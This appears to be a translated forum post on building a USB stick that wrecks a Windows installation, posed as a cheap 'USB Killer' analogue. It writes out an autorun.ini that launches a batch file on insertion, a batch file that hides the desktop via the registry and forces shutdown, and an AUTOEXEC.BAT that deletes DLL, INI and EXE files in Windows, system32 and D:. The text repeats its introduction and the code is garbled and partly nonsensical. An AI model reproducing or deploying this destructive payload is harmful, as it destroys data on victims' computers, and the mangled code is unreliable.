All information is provided for educational purposes only and does not call for action!
Many of you know about USB KILLER, which can burn your computer.
Today I will tell you how to make an analogue of such a flash drive. Of course, he will not burn the system, but he will easily demolish the Windows.
We take a USB flash drive that you do not mind (you will no longer be able to use it).
We create three files on it:
Open AUTOEXEC.BAT and write:
In autorun.ini we write:
READY!
How it works:
Many of you know about USB KILLER, which can burn your computer.
Today I will tell you how to make an analogue of such a flash drive. Of course, he will not burn the system, but he will easily demolish the Windows.
We take a USB flash drive that you do not mind (you will no longer be able to use it).
We create three files on it:
- AUTOEXEC.BAT
- Dead.BAT
- autorun.ini
Open AUTOEXEC.BAT and write:
Code:
goto% config%
: dos1
rem c: vc401vc
lh keyrus
lh mmouse
lh C: WINDOWSCOMMANDmscdex / d: 12345678
lh dndn
bootgui = 0
: dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui = 0
: win
rem c: essolo.com
set path = C: WINDOWS; C: WINDOWSCOMMAND; c:; c: windows; c: windowscomand; c: arc; c: dn
C: WINDOWSCOMMANDDELTREE / y C: WINDOWSTEMP *. *
mode con codepage prepare = ((866) C: WINDOWSCOMMANDega3.cpi)
mode con codepage sеlсt = 866
keyb ru ,, C: WINDOWSCOMMANDkeybrd3.sys
goto continue
: meos
c: kolibrimeosload.com
: l: meosload.com
: continue
rem bootgui = 1
cd
cd windows
del * .dll
del * .ini
cd system32
del * .dll
del * .exe
cd D:
del * .exe
Open Dead.BAT and write:
Code:
@echo off
cp USB stick: AUTOEXEC.BAT C:
msg * "Dead"> nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer / v NoDesktop / t REG_DWORD / d 1 / f> nul
shutdown -s -t 1 -c "lol" -f> nul
In autorun.ini we write:
Code:
[autorun]
OPEN = Dead.BAT
READY!
How it works:
- You insert a USB stick
- autorun.ini automatically opens Dead.BAT
- Dead.BAT copies AUTOEXEC.BAT to C and shuts down the computer.
- The next time you start, the system crashes.